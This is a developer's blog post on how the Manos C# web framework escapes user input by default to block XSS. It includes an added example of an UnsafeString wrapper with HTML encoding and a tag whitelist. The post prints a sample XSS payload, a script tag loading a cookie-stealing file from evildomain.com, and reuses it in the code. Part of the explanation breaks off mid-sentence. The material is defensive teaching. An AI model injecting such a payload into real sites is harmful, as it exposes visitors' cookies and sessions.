Cleaning up user input in Manos
I’ve been working on making Manos more secure by default. One of the big things I worry about is XSS attacks. I’m sure that most people understand XSS attacks, but here’s a quick example of how things could go bad.
In the Shorty app that’s included in the (upcoming) first release of Manos, we have a method like this:
void SubmitLink (Shorty app, IManosContext ctx, string link)
{
// Save the link
}
and one that looks like this:
void LinkInfo (Shorty app, IManosContext ctx, string id)
{
var info = // ... look up the link, click count, etc.
ctx.Response.WriteLine (@"<html>
<head><title>Welcome to Shorty</title></head>
<body>
{0} was clicked {1} times.
</body>
</html>", info.Link, info.Clicks);
}
So imagine someone tried to submit this as a link:
<script type=text/javascript src="http://evildomain.com/steal-cookies.js">
Now any time someone visits the LinkInfo page for that link, their browser is going to run the steal-cookies.js script from evildomain.com, which will presumably steal their cookies. Right?
Wrong. It turns out Manos encodes all user input by default. Strings that come from the URL, from form data, or as parameters are not stored as plain strings; they are stored as an UnsafeString and escaped before being passed to handler methods as parameters.
So when our SubmitLink function is called we don’t get “
It's not implemented yet, but a CleanHtml property will be added eventually. It will produce a valid HTML string from the value, using a whitelist of allowed elements and attributes.
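To make the two ideas above concrete, here is an added example (mine, not Manos's own code) of a small UnsafeString-style wrapper: the raw value is kept, the escaped form is what a plain string parameter receives by default, and a CleanHtml property lets a closed set of attribute-free tags through while encoding everything else. The class, property and method names are assumptions and do not match the real Manos API; the payload is the one from the post.

```csharp
using System;
using System.Net;
using System.Text;
using System.Text.RegularExpressions;

// Illustrative wrapper in the spirit of Manos's UnsafeString.
// Added example code: names and behaviour here are assumptions, not the
// framework's actual implementation.
public sealed class UnsafeString
{
    readonly string raw;

    public UnsafeString (string raw)
    {
        this.raw = raw ?? String.Empty;
    }

    // The value exactly as the client sent it. Only reach for this when
    // you are certain it will never be written into an HTML response.
    public string UnsafeValue {
        get { return raw; }
    }

    // The value with <, >, &, " and ' encoded, so a browser renders it as
    // text rather than parsing it as markup. This is the default.
    public string SafeValue {
        get { return WebUtility.HtmlEncode (raw); }
    }

    // Whitelist-based cleaning: only exact, attribute-free tags from a
    // fixed set survive; every other character run is encoded. Allowing no
    // attributes keeps event handlers (onload=...) and javascript: URLs
    // out by construction, which is why the whitelist is so narrow.
    public string CleanHtml {
        get {
            var allowed = new Regex (@"</?(b|i|em|strong|p)>", RegexOptions.IgnoreCase);
            var sb = new StringBuilder ();
            int last = 0;
            foreach (Match m in allowed.Matches (raw)) {
                sb.Append (WebUtility.HtmlEncode (raw.Substring (last, m.Index - last)));
                sb.Append (m.Value.ToLowerInvariant ());
                last = m.Index + m.Length;
            }
            sb.Append (WebUtility.HtmlEncode (raw.Substring (last)));
            return sb.ToString ();
        }
    }

    // Implicit conversion yields the escaped form, so a handler whose
    // parameter is declared as string gets the safe value without asking.
    public static implicit operator string (UnsafeString s)
    {
        return s.SafeValue;
    }

    public override string ToString ()
    {
        return SafeValue;
    }
}

public static class Demo
{
    // Constructed sample: the link submitted in the post.
    const string Payload = "<script type=text/javascript src=\"http://evildomain.com/steal-cookies.js\">";

    // Same fixed template as LinkInfo; the template is trusted, the
    // arguments are data.
    static string RenderLinkInfo (string link, int clicks)
    {
        return String.Format ("<html><body>{0} was clicked {1} times.</body></html>", link, clicks);
    }

    public static void Main ()
    {
        var input = new UnsafeString (Payload);

        // What a handler taking a plain string receives: the encoded form,
        // so the <script> tag is rendered as literal text.
        string asParam = input;
        Console.WriteLine (RenderLinkInfo (asParam, 3));

        // With CleanHtml, whitelisted formatting survives and script does not.
        var mixed = new UnsafeString ("<b>bold</b> and <script>alert(1)</script>");
        Console.WriteLine (mixed.CleanHtml);
    }
}
```

The important design point is the default: the conversion to string is the escaped form, so forgetting to encode is not an option a handler has, and the raw value has to be requested explicitly by name.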
Ongoing
This helps protect against one attack vector and I think it is a good start. However, there are still a lot of other things to worry about. The next issue I want to work on is cross-site request forgery (CSRF) attacks.
As always, any feedback or advice is appreciated.